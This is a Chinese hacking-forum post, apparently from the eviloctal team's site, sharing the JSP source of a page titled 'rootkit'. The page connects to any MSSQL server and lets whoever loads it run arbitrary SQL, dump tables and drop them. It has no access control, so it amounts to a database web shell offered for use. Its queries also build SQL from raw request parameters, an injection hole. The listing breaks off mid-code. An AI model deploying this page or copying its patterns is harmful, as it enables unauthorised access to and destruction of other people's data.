[原创]JSP版MSSQL连接工具

ninty

晶莹剔透§烈日灼然

Rank: 1

帖子: 10
精华: 0
积分: 40
阅读权限: 40
性别: 男
在线时间: 26 小时
注册时间: 2007-11-10
最后登录: 2008-6-28

发短消息
加为好友
当前离线

楼主大中小发表于 2007-11-29 21:23 只看该作者

[原创]JSP版MSSQL连接工具

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
文章作者：NinTy

小菜之作，牛人莫笑，哪里写的不好还请指点。

Code Language : Java

<%@ page import=\"java.sql.*\" contentType=\"text/html; charset=GBK\"%>
<%@ page import=\"java.util.*\"%>
<html>
<head>
<title>rootkit</title>
<script type=\"javascript\">
var db = \"master\";
function getTables() {
window.open(\"<%=request.getRequestURL().toString()%>?action=getTables&db=\"+db,\"\",\"scrollbars=yes\");
}
function logout() {
location.href=\"<%=request.getRequestURL().toString()%>?action=logout\";
}
function changevalue(select) {
document.getElementById(\"sqlcmd\").value = \"use \"+select.options[select.selectedIndex].value+\";select * from sysobjects\";
}
</script>
</head>
<body bgcolor=\"#ffffff\">
<base href=\"<%=request.getRequestURL()%>\" />
<%
if ((session.getAttribute(\"conn\") == null && request.getParameter(\"username\") == null) || request.getParameter(\"action\") == null) {
%>
<form method=\"post\" action=\"?action=getConn\">
<table cellpadding=\"0\" cellspacing=\"0\" width=\"200\" border=\"1\">
<tr>
<td>
IP:
</td>
<td>
<input name=\"ip\" type=\"text\" id=\"ip\">
</td>
</tr>
<tr>
<td>
USERNAME:
</td>
<td>
<input name=\"username\" type=\"text\" id=\"username\">
</td>
</tr>
<tr>
<td>
PASSWORD:
</td>
<td>
<input name=\"password\" type=\"password\" id=\"password\">
</td>
</tr>
<tr>
<td>
PORT:
</td>
<td>
<input name=\"port\" type=\"text\" id=\"port\">
</td>
</tr>
</table>
<p>
<input name=\"btnok\" type=\"submit\" id=\"btnok\" value=\"连接\">
</p>
</form>
<%
return;
} else if (request.getParameter(\"action\").equals(\"getConn\")){
if (session.getAttribute(\"conn\") != null) {
response.sendRedirect(request.getRequestURL().toString()+\"?action=operator\");
return;
}
String ip = request.getParameter(\"ip\");
String username = request.getParameter(\"username\");
String password = request.getParameter(\"password\");
String port = request.getParameter(\"port\");
try {
Class.forName(\"com.microsoft.jdbc.sqlserver.SQLServerDriver\");
Connection conn = DriverManager.getConnection(\"jdbc:microsoft:sqlserver://\"+ip+\":\"+port+\";DatabaseName=master\",username,password);
session.setAttribute(\"conn\",conn);
response.sendRedirect(request.getRequestURL().toString()+\"?action=operator\");
} catch (Exception e) {
out.println(e.getMessage());
}
} else if (request.getParameter(\"action\").equals(\"operator\")) {
Connection conn = (Connection)session.getAttribute(\"conn\");
if (conn != null) {
ArrayList dbs = (ArrayList)session.getAttribute(\"dbs\");
try {
if (dbs == null) {
PreparedStatement stmt = conn.prepareStatement(\"select name from sysdatabases\");
ResultSet rs = stmt.executeQuery();
dbs = new ArrayList();
while (rs.next()) {
dbs.add(rs.getString(1));
}
rs.close();
stmt.close();
session.setAttribute(\"dbs\",dbs);
}
} catch (Exception e) {
out.println(e.getMessage());
}
%>
<table width=\"100%\" cellpadding=\"0\" cellspacing=\"0\" border=\"1\">
<tr>
<td width=\"20%\">
选择数据库:
</td>
<td width=\"80%\">
<select name=\"database\"
onChange=\"db = this.options[this.selectedIndex].value;changevalue(this)\"
id=\"database\">
<%
for (int i = 0;i<dbs.size();i++) {
String str = (String)dbs.get(i);
request.setAttribute(\"db\",str);
%><option ${db== param.db ?\"selected\":\"\" } value=\"<%=str%>\"><%=str %></option>
<%
}
%>
</select>
<span style=\"cursor: pointer\" onclick=\"getTables()\">查看用户表(要查看系统表请用命令)</span>
<span onclick=\"logout()\" style=\"cursor: pointer\">退出</span>
</td>
</tr>
<tr>
<td>
SQL Command:
</td>
<td>
<form action=\"?action=operator&cmd=execute\"
onsubmit=\"this.action += '&db='+document.getElementById('database').options[document.getElementById('database').selectedIndex].value\"
method=\"post\">
<input name=\"sqlcmd\" type=\"text\" id=\"sqlcmd\"
value=\"${empty param.sqlcmd?\" use master;select * from
sysobjects\":param.sqlcmd}\" size=\"80\">
<input type=\"submit\" name=\"Submit\" value=\"执行\">
</form>
</td>
</tr>
<tr>
<td valign=\"top\">
结果:
</td>
<td>
<%
if (request.getParameter(\"cmd\") != null) {
String sql = request.getParameter(\"sqlcmd\");
try {
Statement stmt = conn.createStatement();
if (stmt.execute(sql)) {
ResultSet rs = stmt.getResultSet();
ResultSetMetaData data = rs.getMetaData();
int i = 1;
%>
<table bordercolor=\"#33CCFF\" border=\"1\" cellspacing=\"0\"
cellpadding=\"0\">
<tr>
<%
for (;i<=data.getColumnCount();i++) {
%>
<th><%=data.getColumnName(i) %></th>
<%
}
%>
</tr>
<%
while (rs.next()) {
out.println(\"<tr>\");
for (i=1;i<=data.getColumnCount();i++) {
%>
<td style=\"word-break: break-all\">
<%=rs.getString(i) %>
</td>
<%
}
out.println(\"</tr>\");
}
%>
</table>
<%
rs.close();
stmt.close();
} else {
out.println(\"命令成功执行!\");
}
} catch (Exception e) {
out.println(e.getMessage());
}
} else {
out.println(\" \");
}
%>
</td>
</tr>
</table>
<%
}
} else if (request.getParameter(\"action\").equals(\"getTables\")) {
String db = request.getParameter(\"db\");
if (db != null) {
Connection conn = (Connection)session.getAttribute(\"conn\");
try {
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery(\"select name from [\"+db+\"]..sysobjects where xtype='U' and status>0\");
%>
<table>
<tr>
<th>
表名
</th>
<th>
操作查看数据
</th>
</tr>
<%
while (rs.next()) {
%>
<tr>
<td><%=rs.getString(1) %></td>
<td>
<a target=\"_blank\"
href=\"<%=request.getRequestURL().toString()+\"?action=deleteTable&db=\"+db+\"&Table=\"+rs.getString(1) %>\">删除</a>
</td>
<td>
<a target=\"_blank\"
href=\"<%=request.getRequestURL().toString()+\"?action=getContents&db=\"+db+\"&table=\"+rs.getString(1) %>\">查看</a>
</td>
</tr>
<%
}
%>
</table>
<%
rs.close();
stmt.close();
} catch (Exception e) {
out.println(e.getMessage());
}
}
} else if (request.getParameter(\"action\").equals(\"logout\")) {
Connection conn = (Connection)session.getAttribute(\"conn\");
try {
conn.close();
session.invalidate();
response.sendRedirect(request.getRequestURL().toString());
} catch (Exception e) {
out.println(e.getMessage());
}
} else if (request.getParameter(\"action\").equals(\"getContents\")) {
String db = request.getParameter(\"db\");
String table = request.getParameter(\"table\");
if (db != null && table != null) {
try {
Connection conn = (Connection)session.getAttribute(\"conn\");
if (conn != null) {
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery(\"select * from [\"+db+\"]..[\"+table+\"]\");
ResultSetMetaData data = rs.getMetaData();
out.println(\"<table border=1 cellpadding=0 cellspacing=0>\");
int i = data.getColumnCount();
out.println(\"<tr>\");
for (int a = 1;a<=i;a++) {
out.println(\"<th>\"+data.getColumnName(a)+\"</th>\");
}
out.println(\"</tr>\");
while (rs.next()) {
out.println(\"<tr>\");
for (int a= 0;a<i;a++) {
out.println(\"<td style='word-break:break-all'>\"+rs.getString(a+1)+\"</td>\");
}
out.println(\"</tr>\");
}
out.println(\"</table>\");
rs.close();
stmt.close();
}
} catch (Exception e) {
out.println(e.getMessage());
}
}
} else if (request.getParameter(\"action\").equals(\"deleteTable\")) {
try {
String db = request.getParameter(\"db\");
String table = request.getParameter(\"Table\");
Connection conn = (Connection)session.getAttribute(\"conn\");
Statement stmt = conn.createStatement();
stmt.executeUpdate(\"drop table [\"+db+\"]..[\"+table+\"]\");
out.println(table + \"表已被执行删除操作，请刷新父页面以确认表是否被删除!\");
stmt.close();
} catch (Exception e) {
out.println(e.getMessage());